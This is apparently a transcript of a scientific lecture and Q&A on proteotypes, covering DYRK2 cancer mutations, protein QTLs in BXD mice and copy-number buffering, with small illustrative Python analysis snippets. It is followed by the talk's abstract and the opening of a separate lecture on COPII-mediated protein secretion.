and the function of these modules — Linus Pauling's principle.
So we postulate that if we could measure this proteotype — the composition as well as the organization of the proteins — we would be able to make a useful link between genotypic variation and phenotype. Specifically — and I will expand on some of these points — the proteotype is the result of complex processes acting at multiple, poorly understood layers: there are transcriptional models, models for how RNA interference and microRNAs affect gene expression, models of translational control, and of course protein kinases affecting phosphorylation. For each of these levels there is information, but anyone would be hard pressed to integrate it all into one comprehensible, predictive model in a computer. The cell, however, does know how to integrate the control events at each of these levels, and it generates one entity — the proteotype — which is the net result of control at all of them. We assume that the proteotype reflects the response of a cell: the cell experiences a perturbation, genetic or otherwise — I will come back to this — it knows how to react, and if we can measure that reaction we learn some biology. We further assume — this is essentially the principle of Beadle and Tatum, and of Pauling — that the proteotype determines the biochemical state and is therefore very close to defining the phenotype. Also, we do not ask what a particular gene or protein does — that is largely known: a kinase phosphorylates certain residues, a ubiquitin ligase ubiquitinates certain residues, a protease digests certain proteins, and we can measure that in vitro. The question we try to address is how the proteotype — the system — responds when such a function is altered. And we would represent the proteotype as a system with different levels of resolution: eventually there will be high resolution all the way down to crystal structures and the atomic level, but for the moment we have to accept that certain areas of biology are known in great detail and can be represented by very dense data while others are not — the whole discussion about trafficking is a field where an enormous amount of prior information has accumulated, and we would like to integrate such data into a larger representation at the level of the proteins. So this is what we try to achieve, and these are the considerations that lead us to believe that it will be very hard to infer or predict how genomic variability — or, for that matter, environmental insults — affects the cell if we only make genomic measurements. In the following I would like to expand on a few of these principles with actual data. The first question I want to address is: how does a simple genomic perturbation affect the proteotype?
So now we go to an experimental design in which we introduce, on an otherwise invariant genetic background, specific mutations in a specific protein — mutations derived from medicine, that is, mutations that have been associated with specific diseases, particularly cancer. We ask what effect these mutations have: if they are in the same gene but of different types, how do they affect the composition and modularity of the respective protein module, and what effect do the changes in this module have on the cell's protein landscape? So the experiment is to express mutated forms of a protein and determine the effects on its interactions and its function. We use a protein kinase, DYRK2, because the response to mutations is easy to measure for a kinase: its function is to phosphorylate proteins, so we can simply ask whether the mutated forms phosphorylate different proteins, fewer, or additional ones, and we measure the effects of these mutations. How did we end up with DYRK2? A computational postdoc in the group developed a system we call "domino effect", in which she combines the genomic mutations from cancer genomics data — a massive amount of data, more than 10,000 genomes from cancer tissue and matched normal adjacent tissue — and tries to distill this down to mutations that very likely have an effect on protein function. She does that by statistical arguments — looking at the likelihood that the molecule is mutated at that particular site — and by prediction tools asking whether a given mutation is likely to change the conformation of the protein or an interaction of the affected protein. She came up with what she calls hotspot mutations in 156 genes, for which there is a fairly high likelihood that, if introduced into an otherwise invariant background, they would change protein folding or protein interactions. What information is used to distinguish the different effects of these mutations — was there a specific study behind that? These mutations have all been found in genomic data, that is, found to be mutated in patients with a certain type of cancer. Many of them are not known to be significant — there are tens of thousands — so she simply tried to categorize those likely to have an effect on the protein, first on the basis of frequency of occurrence, and second on whether they fall, in the folded protein, on residues suggesting that the fold might be disturbed or that an interaction with something else might be changed. And how do you get that structural information — do you have observations on this particular protein? I am coming to the experimental data.
That was based simply on predictions — structure and docking predictions — where you predict the structure of the protein, map the mutation onto it, and if it falls in a region predicted to be interactive, it is assumed to have an effect. Which are of course not very precise — and I will come to experimental data. How do you distinguish variants that are just frequent polymorphisms from causal ones? By frequency. So this is one of the 156 or so proteins that came out, and the one we followed up: a protein kinase called DYRK2. It is an interesting enzyme. It acts as a module: this is the kinase itself, and one of the proteins it binds is a ubiquitin ligase, so it sits at an intersection of protein phosphorylation and ubiquitination; then there are two other proteins, so the core we want to study is a tetrameric complex. It has a number of disease-associated mutations, and some of the subunits have been crystallized as individual proteins, so structures are known. In this genomic data set, 81 mutations map to this protein — some with no disease association, some with — and Maria filtered them down to a small number that we then tested: a truncation that removes the C-terminal tail, an event that happens relatively frequently in cancer; two point mutations at the site where the truncation occurs; a mutation in the activation loop of the kinase, which therefore affects its activity; a mutation in the catalytic site, thought to render it inactive; and a mutation in a region whose function we do not know. All of these mutations, labelled here, occur frequently in patients with certain diseases. A postdoc, Martin Mehnert, generated cell lines expressing each mutated form of the protein, and we then measured the interactions around the core complex. We see that each mutation — even those that only change a single residue somewhere in the protein whose function we do not really know — has a different effect on the module. The way to read this graph: this is the mutation that renders the kinase inactive, and these colours are the three interactors of the tetrameric core. If we inactivate the kinase by mutation, there is a substantial drop in the binding of some of the subunits; some mutations have very little effect, but every one of them affects the interactions in some way. So they all perturb the module, some more, some less, and as expected the biggest change comes from the truncation mutant lacking the C-terminal part, which is fairly plausible. So what we know so far is that the DYRK2 mutants, derived from clinical information, show significant but varying impact on the assembly of the kinase core complex. How do you measure the interactions? We use two methods.
One is affinity purification–mass spectrometry, where we tag the protein, pull it out and identify the interactions; the other is called BioID, where we express a modified fusion protein that chemically labels the proteins around it. The results of the two are not identical, but they largely converge. A related question: is this in the context of the wild-type protein — expression on top of the wild type, or a knock-in? This is expression on top of the wild-type protein; I will come to a knock-in in a second. So the message so far: we often say a mutation affects this gene, the gene is eliminated or somehow modified, and we then try to make an inference from the mutated gene to the phenotype. What I am trying to show is that each mutation, even at the level of the organization of this protein with its core module, has a different effect. Does it act as a dominant negative on the endogenous protein? No, it is just expressed on top, and the endogenous protein is essentially transparent to these techniques — although there could be titration effects: if you express a tagged protein it can mop up interactors and shift the equilibrium. It seems to me that what you are doing is letting nature do the mutagenesis, and the phenotype came out because you had the patients — the equivalent would be to start from scratch, do the mutagenesis on my protein myself and get my readouts; you just let evolution do the experiment for you? These are mutations that are filtered and statistically associated with certain tumours — we do not say they cause cancer. What I am trying to show is that these mutations, even though they affect the same gene and are usually lumped together, each have an intricate, idiotypic effect on this module. And if you accept Linus Pauling's idea of molecular disease — that a mutation affects the structure and the function of a molecule — then each of these has its own footprint. Right, but that is the same experiment I would have done in the laboratory in a mutant screen — I could drive mutagenesis and select for it. Of course, that has been done; but we are trying to find ways to use the genomic variability that is associated with disease, like cancer, to help make the link from these mutations to the phenotype. You could take any gene, mutagenize it, and see what happens, but that is not quite the question we ask here. But there would be no phenotype in your experiment. Why not? Suppose I am working on a pathway, in adipocytes, and I have a readout which is a certain phenotype — not a disease, but a failure to internalize — and I do accelerated mutagenesis in the lab, map the mutations onto the protein and then cluster the properties. Yes, of course, that has been done.
I'm not here in nature to do the experiment for you. Of course, it's been done. But there's a big difference. Is that you are in nature, and therefore there is no, when you are in the lab, you work in an isogenic background. Not necessarily. It depends. If you do genetics, generally what you do. And here, that's the first thing you do. And second, you can exactly start to work on your mutation when you have isolated the phenotype. That means that you don't let the systems evolving further to generally, in cancer, you don't have one mutation. You have many mutations that probably are, the first is the one that might have caused the cancer. The second one is the one that's allowed to survive the first mutation. So you have a very long evolution of a complex pattern of... I understood that. But I still, conceptually, I don't understand the difference. I mean, I'm just, to me, the difference is in one case, I allowed millions of years to do this. Whereas in the other one, I just did it as celebrated. So maybe because I'm doing a celebrated, I have less time to do the more spread thing, or maybe I'm doing less subtle phenotypes. Yes, so I agree. If you work in the yeast or with flies, of course, this has been done a lot, even with mice. There's been huge consortia that basically do mutagenesis and see what phenotypes arise. And I would just like to make the point here that if you then say the gene was mutated, that this is not sufficient granularity to make, eventually, mechanistic link, because different mutations, even in the same gene, in a particular genetic background, have very different effects on the modularity, as I will show now, also on the function. But I think it has a much more fundamental effect, is that when you do that in the lab, you are looking for a strong phenotype. So I have done experiments, for example, where I'm looking at a particular pathway. I do have a per-turbation in my gene, and then I actually see compensations in the system. And sometimes you don't even, actually, we don't actually see a readout on the phenotype. The compensation is such that you don't see a readout. But since I know the module, as you are pointing out, I'm looking, let's say, at the level of expression of some other proteins, and then you see there was compensation, let's say. There was no phenotypic readout, right, because the system compensated, right? This is generally a rare case. In general, when you do experiments in the lab, you go for the strong phenotype. And what is remarkable is that when you look in nature, you never have the same mutations. Okay, maybe we'll continue later. Sorry. No, I mean, there's no way that there was a difference. Do anything people. You cannot do the lab experiment with people. Yes, but I think the principles that we're trying to elaborate here also apply to mutations that are generated by random mutochats. But the point is it's not unexpected, because if you're looking at a very specific function, I mean, this mutant P192 rubber is a bit... Yes, so I was just trying to say that various mutations which have been selected and been through statistical arguments associated with the phenotype, that they affect the protein differently at the level of organization, and now we ask what does it do at the level of its function, which is to phosphorylate other proteins. And so we can find on this protein a number of phosphorylation sites. 
We measure them and we quantify them, and we can see that, again, each mutation has a different pattern across the few measurable phosphorylation sites on this protein. So the mutations that have been selected and expressed not only affect the wiring, basically the modularity; they also affect the phosphorylation state of the protein itself. And then we also carried out, and this is now a knock-in experiment, a study to see how these mutations, which presumably perturb modules, affect the overall function, basically the phosphorylation landscape or pattern downstream of this protein. So the experiment was to take cells, to knock out the endogenous kinase with CRISPR-Cas9, to knock in the mutant forms of the kinase, which are then expressed, and then we isolate proteins from these cells, we purify phosphopeptides, and we analyze these phosphopeptides in a mass spectrometer. So we quantify about 1200 or so phosphorylation sites in all these mutants, and by simple clustering these phosphorylation patterns look quite similar. So that means that these subtle mutations in this protein do not radically change the overall protein phosphorylation landscape, which of course is expected, because in the same cells there are hundreds of other kinases active at the same time. But when we start to look more closely at which phosphorylation sites are affected, and we focus on this panel over here, we see again the various mutants, these are now knock-in mutants, there is no more wild-type kinase, and we see that there is a set of proteins, about 30 to 40 phosphoproteins and phosphorylation sites, which change in response to the various mutations, and these phosphorylation patterns change, again, in a way that depends on the type of mutation. We see the complete knockout, which is the strongest footprint here, the second to last. We have the deletion mutant, where the C-terminus is deleted; this is similar, this is strong, but not as strong as the knockout. And then we have the kinase-dead mutant, which is the third one from here, which is again similar to the knockout but not identical. And then we have the other mutations, which affect different residues and which have a footprint on the phosphoproteome that is detectable and affects specific proteins, but not as strongly as the absence of the kinase. So we can of course then look at what these proteins do, and this then provides a link between the activity of this protein, or its modified forms, that is, the effect of a mutation of this protein on specific phosphoproteins. And if we assume that phosphorylation is responsible for modulating activity, we can say that specific mutations in this single protein, DYRK2, mutations which have basically been selected through evolution, affect various areas of cellular physiology. For instance, some map to methyltransferases in an epigenetic complex. We have this protein here, a scaffold protein associated with GTPases, and there are probably people here who know a lot about this protein; nuclear pore proteins, which we also heard a lot about yesterday; and cell cycle regulating proteins.
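To make the clustering step above concrete, here is a minimal sketch, assuming Python with numpy and scipy, of grouping mutants by the similarity of their phospho-footprints. The 6 x 5 matrix of log2 changes is invented purely for illustration; the real analysis involved on the order of 1200 sites.

```python
# Toy illustration of clustering mutants by their phosphorylation footprints.
# Values are invented log2 changes vs. wild type; rows = phosphosites, cols = mutants.
import numpy as np
from scipy.cluster.hierarchy import linkage, fcluster
from scipy.spatial.distance import pdist

mutants = ["knockout", "C_term_trunc", "kinase_dead", "act_loop_mut", "other_mut"]
phospho = np.array([
    [-2.1, -1.8, -1.9, -0.6, -0.2],
    [-1.7, -1.5, -1.6, -0.4, -0.1],
    [ 0.1,  0.0,  0.1,  0.0,  0.0],
    [-1.2, -1.0, -1.1, -0.3, -0.2],
    [ 0.9,  0.8,  0.7,  0.2,  0.1],
    [ 0.0,  0.1,  0.0,  0.0,  0.1],
])

# Euclidean distance between mutant profiles, average-linkage hierarchical clustering.
tree = linkage(pdist(phospho.T), method="average")
labels = fcluster(tree, t=2, criterion="maxclust")
for name, lab in zip(mutants, labels):
    print(f"{name:>13s} -> cluster {lab}")
# Expected grouping: strong footprints (knockout, truncation, kinase-dead) separate
# from the milder point mutants, mirroring the pattern described in the talk.
```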
So what we conclude is, from this, is that if we take a number of mutations that have been selected to be related to disease, and if we introduce these mutations in this protein, in a cell, in otherwise isogenic background, they affect both the organization of this module and its function, and they do it in a highly modulated way, and the function of this protein complex, which is a kinase, affects different parts of the cell's physiology. So this points to a lot of complexity of how these mutations mechanistically affect physiological processes. So this is basically what we conclude from this, and I would, the overall conclusion, the complexity of the cellular response to a simple genomic perturbation, one mutation, is beyond the reach of mechanistic models, because we have no good way to predict a priori which parts will be touched by, for instance, a kinase, or a ubiquitin ligase, or a protease, that's mutated. Okay, so now, see, I'm getting, of course, very late, we, I won't get through, so we'll see, then we would like to, yeah, that's fine. Yeah, but I made a note. So I won't get through the third part, of course, which is actually also, well, anyway. So now, we, I would like to extend this to a situation, now we have basically had one background, one mutation, ask what happens. And now we would like to go to more natural situation, where we say we have a number of genetic variants in various, in a population, and we'd like to ask, to what extent can we use this natural variation to make linkages, eventually mechanistic linkages, for predicting a phenotype. So this is usually discussed controversially, and because there's a lot of people, like those here, who are very famous article by now, who expunges the idea that we don't need to have any hypothesis anymore, we don't really need to understand mechanisms, correlation is enough. So the idea is, if you pile up enough data, measure enough genomes, do genome, GWAS studies, with enough cohort size, we will not need to make, to understand the underlying mechanisms, we can simply make correlations and make statements. So this is widely used in, also in clinical circles. And I'd like to show that this is probably, well, almost certainly an all underestimation of the problem, and that correlation will not be enough. So how do we show that? If I may, it's used as markers, biomarkers, we should say. It's not meant to be a mechanistic model, it's just, if you have 100,000 people, with this, this, this, this, this, and this mutation, and there are these diseases, or these, whatever, these stages of the disease, you can say there are good chances that if you have someone with this, this, this, this, but it's only biomarkers. It is, and it's risk, it's not even a market, it's risks, and I think we know from these, now very large, I mean some of these large GWAS studies are now hundreds of thousands of individuals have been genotyped, and what of course comes out is that there is the larger the cohort, the more genes show a small signal in these Manhattan plots, and so they produce, there's additional genes or mutations in genes associated with a complex disease, but they are very, very small contributions. How these contributions can be used even clinically to make a risk assessment is actually very difficult. I think this is a philosophical point, I think one needs to eventually, if one wants to do a risk assessment or treatment decision, know something about the mechanism. Yes. 
So we would now like to explore how we can use systematically collected data sets in populations, together with mechanistic insights and prior information, to learn something about the system. So this is the outline, and this is the system we use. We use this system because we think that if we cannot make any headway in a system which has controlled, known genomic variability, we will have a very hard time going to an outbred human population. So this is an interesting collection of mouse strains which has been generated by an international consortium; we certainly have not contributed to that, we are the beneficiaries of it. Two mice, a C57 black (C57BL/6) mouse and a DBA mouse, were crossed. An F1 generation and then an F2 generation were generated, and out of that, strains were inbred, so each one of these strains is genetically identical within itself, they are inbred, and the genomes of these strains all have the property that alleles from either the one parent or the other have been distributed across the strains, and there are about 180 strains of that. So it's a terrific resource, because we know the genetic variability; it is limited in the sense of the alleles that are present, but the distribution of the alleles is of course different from strain to strain. So we have used these strains in an experiment; this is an early phase, and there is now a larger data set which I don't want to discuss, but we selected 192 proteins which are relevant for metabolism and selected them for quantification across this cohort. So they cover some metabolic pathways. We took 40 of these strains, which were grown either on normal food or on food that makes them fat, so this is an external perturbation. We have a genetic axis, which is the genotype, which is known, and we have an environmental axis, a diet axis, and we did this for 40 strains. So for 40 strains we measure, in duplicate, under two conditions, high fat or low fat, close to 200 metabolic proteins. And then we want to see how this data set can be used to learn something about the genetic effect or the environmental effect on the behavior of this pathway. So this is just showing that the data looks good. This is the data table, so this is what I said at the beginning: we now have the ability to measure proteins precisely and quantitatively across cohorts. These were, by today's terms, rather low numbers, focused so as to make the point efficiently. And so we can now link, using QTL mapping, quantitative trait locus mapping. We can now make a link between the presence of a particular allele at a locus and the abundance of a protein. So this is referred to as a protein QTL. So we assume that one allele causes the protein to be more highly expressed than the other allele from the other parent. And since we have a sufficient number of these measurements, we can relate the presence of a particular allele to the abundance of a protein, and this is referred to as QTL mapping. So what we see here is that we identify, from these 192 proteins, 44 QTLs. So these are loci at which an allele affects the abundance of a protein. Some are in cis, meaning the locus affects the product encoded by that same locus, and some are in trans, meaning the locus affects the abundance of a protein that is coded for by a different locus.
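For readers unfamiliar with QTL mapping, here is a minimal single-marker sketch of the test just described, assuming Python with numpy and scipy; the genotypes and protein abundances below are simulated toy values, not the actual BXD measurements.

```python
# Toy single-marker pQTL test: does the parental allele (B = C57BL/6, D = DBA)
# at one locus associate with the abundance of one protein across ~40 strains?
import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
n_strains = 40
genotypes = rng.choice(["B", "D"], size=n_strains)              # marker genotype per strain
allele_effect = np.where(genotypes == "B", 0.8, 0.0)            # simulated allele effect
protein = 10.0 + allele_effect + rng.normal(0, 0.5, n_strains)  # log2 protein abundance

diff = protein[genotypes == "B"].mean() - protein[genotypes == "D"].mean()
t, p = stats.ttest_ind(protein[genotypes == "B"], protein[genotypes == "D"])
print(f"allelic difference in mean abundance: {diff:.2f}, p = {p:.1e}")
# A genome-wide scan repeats this test (or a linear model) for every marker and
# every protein, with multiple-testing correction, to call cis- and trans-pQTLs.
```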
So this is not super interesting or super remarkable, but we also measure eQTLs; these are the transcripts, which are also measured in these mice. We see that we have a rather similar number of QTLs, links between an allele and a transcript, but they have a different behavior. The different behavior is that protein QTLs act more often in trans than the transcript QTLs. That means the transcript regulation is less diverse in the cell than the protein regulation by genetic means. I won't get into the effects of the environment, and now we try to learn something, using this data plus prior knowledge about these pathways, that may be interesting biochemically or actually clinically. So one of the QTLs maps to an enzyme that is at the end, the last enzyme, in the degradation pathway of branched-chain amino acids like lysine or isoleucine. So these are degraded in a stepwise manner, exactly as the Beadle and Tatum principle suggests, and each step here produces a metabolite as an intermediate product. So now we have a QTL, we have a genomic locus that affects the abundance of this respective protein here, this enzyme, and it is either high or it is low. Now we can correlate basically the enzyme level here, which we take as a surrogate for its activity, and we can relate this to the metabolites up here. So we basically do something which is like a water hose, where we say we constrict the water hose, we have less of this enzyme, and we ask, do the metabolites up here pile up? This would be the assumption, and if there is a lot of the protein, a lot of activity down there, we would assume that the metabolites up there decrease in abundance because they are processed. So this just shows that we can do this. The enzyme level is inversely correlated with these metabolites, which are also measured by mass spectrometry. This is exactly the principle of the water hose, constricted or open. We also see that two metabolites up here correlate very nicely, so if one is high, the other is high, which means the enzyme down here constricts the whole pathway. So we have now made a link between a genetic locus, with the allele that controls whether the enzyme level is high or low, and the presence and abundance of metabolites. This is a mechanistic link, because we explain it by the enzyme activity that is present here. Now, interestingly enough, we can find literature that says that this intermediate product here, aminoadipate, a small molecule that is generated in this degradation pathway, has been found in a large cohort GWAS, in the Framingham Heart Study, to be a biomarker for diabetes risk. So this is of course now an interesting case, because it allows us to make the statement that through systematic measurements in genetically perturbed animals, we are able to find a link between a genomic variant in a particular gene and an enzyme abundance. And this enzyme abundance affects the activity of a metabolic pathway, the degradation of branched-chain amino acids. And if the activity at the bottom of the pathway is low, the intermediates pile up, and they have been found to be a risk factor for a complex disease. So do you know if the change is due to the DBA background or the Black 6 background? Because as far as I remember, DBA is most susceptible to diabetes. Yes. Yes, so there is a whole range of disease phenotypic measurements in these mice, and this is amazingly complicated.
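The water hose argument above can likewise be written as a small correlation check. This is a sketch with simulated numbers, assuming Python with numpy and scipy; in the real data both the enzyme and the metabolites are quantified by mass spectrometry.

```python
# If the terminal enzyme is low, the upstream intermediates should pile up:
# expect a negative enzyme-metabolite correlation and a positive correlation
# between the intermediates themselves. Simulated values only.
import numpy as np
from scipy import stats

rng = np.random.default_rng(1)
enzyme = rng.normal(0, 1, 40)                            # enzyme abundance per strain
aminoadipate = -0.7 * enzyme + rng.normal(0, 0.5, 40)    # upstream intermediate
second_intermediate = -0.6 * enzyme + rng.normal(0, 0.5, 40)

rho_e, p_e = stats.spearmanr(enzyme, aminoadipate)
rho_m, p_m = stats.spearmanr(aminoadipate, second_intermediate)
print(f"enzyme vs. intermediate:       rho = {rho_e:.2f} (expect < 0), p = {p_e:.1e}")
print(f"intermediate vs. intermediate: rho = {rho_m:.2f} (expect > 0), p = {p_m:.1e}")
```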
So from these mice, these BXD mice, about 300 phenotypes have been measured, including some disease phenotypes. And many of these phenotypes are quantitative, so you can assign a numeric value to them. And in every case I've looked at, the parents, the DBA or the Black 6, are somewhere in the middle, so you can basically make a plot of the numerical phenotypes from strain 1 to 180, and the parents are always somewhere in the middle, and they create offspring, through the reorganization of the alleles, that are far outside the range of the parents. So this is of course outside Mendelian inheritance, and this is actually the case for all of these quantitative phenotypes that are measured. Yes. Yes, no, I'm... Okay, so I want to summarize this part. I think the correlation of proteotype and genomic measurements in a genetic reference population indicates very complex relationships between genetic constitution and the eventually expressed information. We can, in very specific and simple cases where there is a lot known about the mechanism, use this prior information and relate it to the big data set generated. It's not a super big data set that I showed, but it's a rather substantial data set. And we can then reach a somewhat mechanistic understanding, and I think we need to find ways, and this is a big challenge for the future, to systematically integrate large-scale data with mechanistic knowledge, like that generated by many of the biologists here who work for years on a very complex biological system, to then use these general principles as background and to determine how they are modulated, how this background is modulated in a specific case, in a specific genetic background or under specific conditions, and that can certainly be elaborated by large data sets. So my conclusion clearly is: correlation is not enough. It is a useful tool, but if we think we can use simply the correlation of large data sets to get mechanistic, biologically meaningful insights, I think this will not work. So I wanted to, I was planning to, but now I have skipped this, I wanted to show how the cell processes gene dosage effects, and I don't have time to do this. I would just like to summarize what it does, maybe in one picture. So this is basically a panel of cell lines we collected which, from the sequence, are essentially identical or very similar; these are HeLa cell lines. They're very frequently used in laboratories, 100,000 publications, but they are genomically unstable. And so sequence-wise they're similar, but the genomic landscape is very different. So here we map copy number variation of these cell lines that have been collected from various laboratories where people do experiments. And we see that although these cells have the same name, and they're used in laboratories to do experiments, they're substantially different, not in the sequence, but in the copy number variation, namely the ploidy of genes at specific loci. And I just want to draw your attention to this picture here. This is two of these chromosomes, where hot colors always mean a high ploidy number and green a low ploidy number, and we see that there are very large blocks of regions which are amplified in these cells or not amplified. So it's kind of a green and red block pattern. When we go to the transcripts, this gets already somewhat diffused. If we go to the proteins, it gets very diffused.
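One way to put numbers on that progressive blurring is to correlate each layer with the copy number, gene by gene. The sketch below uses simulated values (assuming Python with numpy); it is only meant to show the kind of attenuation statistic one could compute, not the published analysis.

```python
# For one gene across a panel of cell lines: how well do transcript and protein
# levels track the DNA copy number? A lower correlation at the protein layer is
# one simple signature of post-transcriptional buffering.
import numpy as np

rng = np.random.default_rng(2)
copy_number = rng.choice([1, 2, 3, 4], size=14).astype(float)   # per cell line
transcript = 0.8 * copy_number + rng.normal(0, 0.4, 14)         # follows CNV closely
protein    = 0.3 * copy_number + rng.normal(0, 0.4, 14)         # strongly buffered

r_rna  = np.corrcoef(copy_number, transcript)[0, 1]
r_prot = np.corrcoef(copy_number, protein)[0, 1]
print(f"CNV vs. transcript: r = {r_rna:.2f}")
print(f"CNV vs. protein:    r = {r_prot:.2f}   (lower r = stronger buffering)")
```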
So the effects of this increased or decreased ploidy are interpreted by the cell in extremely complicated ways. And what I do not have the time to show is that the organization into modules of the proteins coming out of these increased-ploidy regions is a big buffer. It's one of the most dominant factors: how the cell modulates the abundance of proteins that are induced by a higher number of copies of a particular gene is determined by the organization of these proteins into complexes. So if a protein is known to go into a complex and the other subunits are not also augmented, that protein is buffered down and is basically degraded. So this is one mechanism, not the only one, by which these copy number variations are interpreted by the cell and lead to a very refined and actually strongly buffered landscape at the level of the proteins, and therefore at the level of the physiologically relevant proteins. So with that I would like to finish and try to show, and this is the topic of this morning, that we can now measure with amazingly effective tools a lot of genomic variability from very large cohorts, thousands or tens of thousands of individuals. We have lots of phenotypic information, and the way we bridge this, I believe, needs to involve proteins, not just the abundance of proteins but also their modularity, and I think if we can make more headway in basically defining this quantitative proteotype by measurements, we will be in a much better situation to link genotypic variability to phenotypes. So these are the collaborators whose work I showed. This last part, which I largely skipped, is the work of Jan Scheglou, together with Wolf Hart, who is a colleague at ETH. The DYRK2 project is the work of Martin Mehnert, a postdoc, and the BXD project is the work of Evan Williams and Yibo Wu, two postdocs, and we work with the group of Johan Auwerx at EPFL, who created and maintains these BXD mice. Thank you for your attention. Thank you. May I have time for a quick question also? Yeah, so I'd like to go back to the list of principles you showed in the beginning, about the predictability of complex systems. For instance, oscillations and the cell cycle are typically the best predicted, and I think they are predicted because what has been modeled is the regulatory layer. So engineers, in any complicated system, distinguish between a regulatory layer, a control system or auto-regulatory system, and the basic core process; in the cell cycle we have, I mean, the spindle and so on and so forth. And in each module, either in a complex man-made machine or in biological machines, it's possible to distinguish a plant, a basic manufacturing plant, and the control system. And engineers distinguish between those two components. It's relatively possible, let's say, if not easy, to understand the modules and the control systems, if we work them out. This goes back also to what I tried to show this morning when I spoke. Once you have identified the modules and the regulatory systems, as I said, it's not hugely complex. It's possible to break down the complexity of the overall system, the cell or the organism, into modules and the regulatory system and the coordination among them. So this will be, I think, a way in which we could maybe try to predict complex systems, by breaking down the complexity into the modules and the regulatory layers. This is what the engineers do, basically. Yes, I agree with that. And I think this is certainly the goal.
The problem is that we are now reasonably good, not perfect, reasonably good in determining the modules that actually do the work, but the control system we don't really know enough. That's exactly the point. And so I think it will be, so we have transcription models, which is one level of control. We have microRNA control, we have translational control, we have phosphorylation control. I think the analysis needs to start from a function and understand what is the control machinery, the control lab on that function. And this is, not that, it's very neglected in cell biology. Yeah, I think this is true. However, it's also very complicated because it's not a single level of control that controls the system. It is many that contribute to the control of the system. So that's why I think that we should work towards figuring out these control mechanisms, of course. But in the meantime, for, I think, foreseeable future, we are limited to, or better off, if we do measurements and basically take the point of view, the cell knows what control systems to use and how these control systems are used to control a particular process. And if we can make a readout that reflects all levels of integrated control, then we would be able to make a better prediction. So this is a surrogate for having a series to do, let the cell do the work and do measurements which are close to determining the field. I agree on the rules, but not on the method. Okay, we can discuss it. One more question. One more question. Woman. I wanted to ask if you think about this prototype as quite stable besides the non-genetic mutations, like transcriptional noise or epigenetic events. So do you think this prototype is quite stable or dynamic configuration? So it is quite stable, it seems. I mean, we are not able to make measurements, of course, at a single cell level. So we always measure aggregates over a certain number of cells, which can be good or bad, we can discuss that, but maybe not here. But in under specific conditions, the prototype is actually quite stable. But it is also strongly reactive, it always reacts. I mean, you know, I try to show with this mutation, even a mutation somewhere in the protein, a single amino acid exchange, in this two kinase, has an effect on the prototype, which is actually noticeable. This is quite remarkable. It's a very sensitive readout, but it is inherently quite stable because through mechanisms like, for instance, the buffering of transcriptional variability at the level of the modules that really matter for the function. So this is what I had to skip over. We'll have to stop now. Let's go for a break. Thank you.
|
The question how genetic variability is translated into phenotypes is fundamental in biology and medicine. Powerful genomic technologies now determine genetic variability at a genomic level and at unprecedented speed, accuracy and (low) cost. Concurrently, lifestyle monitoring devices and improved clinical diagnostic and imaging technologies generate an even larger amount of phenotypic information. However, the molecular mechanisms that translate genotypic variability into phenotypes are poorly understood, and it has been challenging to generally make phenotypic predictions from genomic information alone. The generation of a general model or theory that makes accurate predictions of the effects of genotypic variability on a cell or organism seems out of reach, at least for the intermediate future. We therefore propose that the precise measurement of molecular patterns that best reflect the functional response of cells to (genomic) perturbations would have great scientific significance. We define the term “proteotype” as a particular instance of a proteome in terms of its protein composition and organization of proteins into functional modules. In the presentation we will discuss recent advances in SWATH/DIA mass spectrometry that support the fast, accurate and reproducible measurement of proteotypes. We will show with specific case studies that i) the proteotype is highly modular, ii) genotypic changes cause complex proteotype changes and iii) that altered proteotypes affect phenotypes. Overall, the presentation will introduce the proteotype as a close indicator of the biochemical state of a cell that reflects the response of the cell to (genomic) perturbation and is a strong determinant of phenotypes.
|
10.5446/50909 (DOI)
|
So, alright, so I must admit, I have to thank the organizers, and I think Navam and David must have played a key role in putting my name up for this discussion. So I'm going to try to keep it very simple. I wasn't sure whether this meeting was going to be filled with students and post-docs or just the senior scientists. So I'm going to try to present to you what we have published, and I would really like to get to the point where I'll present stuff that's not in print yet. So this pathway of protein secretion that I have projected here on this slide is an old process. It goes all the way back to the days when George Palade, for the first time, in the 60s and in the early 70s, presented from his analysis the path taken by a protein which is to be secreted: the proteins that have to be secreted by the cells begin their life in the endoplasmic reticulum. They are then transported to the Golgi, and from the Golgi they then make their way out of the cells. And his major thesis was that these transfers between compartments ensure compartmental identity. So when you want to take something out of the ER, you take it selectively. You leave behind the residents and you take the cargo to the next station, and you go on sorting these proteins, till you get to the stage where you have determined that some of the proteins have to be secreted; the other ones might have other destinations in the cell where they have to go. So that was in 1974, and for the last 40 or 50 years a lot of people have worked on this process to gain an insight into how cargos are sorted in the endoplasmic reticulum, how they are packed into a kind of vesicle that has been given the moniker of COP2 vesicles, and how these vesicles bring the cargo to the Golgi. Now within the Golgi the cargos are transferred in the forward direction, but proteins that need to be recycled are brought back by means of COP1 vesicles. So COP1 is a class of vesicles that I had in fact purified with Jim Rothman in 1989, and the COP2 vesicles were identified in 1992, hence the one versus two. So there is still a lot of doubt in the field, even after 40 years of work, whether the traffic in this forward direction is mediated by vesicles or whether it is simply a process by which this cisterna of the Golgi matures. By maturing I mean that proteins that need to be returned are extracted while material that needs to go forward keeps moving. And this becomes particularly important for molecules that are far too big to fit into these classes of vesicles, COP1 and COP2, and these classes of molecules are collagens, mucins, chylomicrons and VLDL particles, and I'll talk about that today. So you know, it has been said by a few that we have almost all the information that we need for this particular pathway of transport, and I tend to differ. I disagree completely. I think we just have the nuts and bolts of this process. Most of our understanding of how cells compartmentalize, how cells secrete many of these proteins, what the signals are, how you control the organization of the compartments while cargos are being moved back and forth, is completely unclear. And this is what my lab has been trying to address for the last many years. Now my talk is going to depend on and describe a lot about COP2 vesicles, which form at the ER. So I think there is a need for me to present our current understanding of what a COP2 vesicle is and how it forms. So you need a set of about six polypeptides. And this is mostly the work of Randy Schekman and Bill Balch and colleagues.
